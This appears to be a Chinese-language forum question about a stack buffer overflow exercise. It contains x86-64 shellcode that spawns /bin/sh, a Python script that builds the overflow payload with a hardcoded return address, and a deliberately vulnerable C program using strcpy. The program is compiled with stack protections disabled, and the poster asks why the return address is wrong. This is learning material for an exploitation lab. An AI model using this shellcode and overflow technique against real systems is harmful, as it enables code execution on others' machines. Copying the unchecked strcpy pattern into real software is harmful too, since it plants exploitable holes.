外壳代码:https ://www.exploit-db.com/raw/42179
利用代码(python):
sh = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
retaddr = "\x7f\xff\xff\xff\x00\x50\xe6"
print(sh + ("A" * (120 - len(sh) - 4)) + retaddr)
漏洞代码(C):
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
char buffer[100];
if (argc != 2) {
fprintf(stderr, "Usage: %s <str>\n", argv[0]);
exit(EXIT_FAILURE);
}
printf("buffer is here: %p\n", &buffer);
strcpy(buffer, argv[1]);
printf("copied %s into buffer\n", argv[1]);
return 0;
}
我使用的虚拟机是:ubuntu-9.04-server-amd64 (2.6.28-11)
.
我如何编译易受攻击的代码:
gcc vuln.c -U_FORTIFY_SOURCE -fno-pie -fno-stack-protector -fno-omit-frame-pointer -ggdb -z execstack -o vuln
我似乎遇到的问题是我无法弄清楚如何让rip
寄存器转到正确的返回地址。
输出:
...
buffer is here: 0x7fffffffe650
...
Program received signal SIGSEGV, Segmentation fault.
0x0007ffff700e650 in ?? ()
有人可以帮忙吗?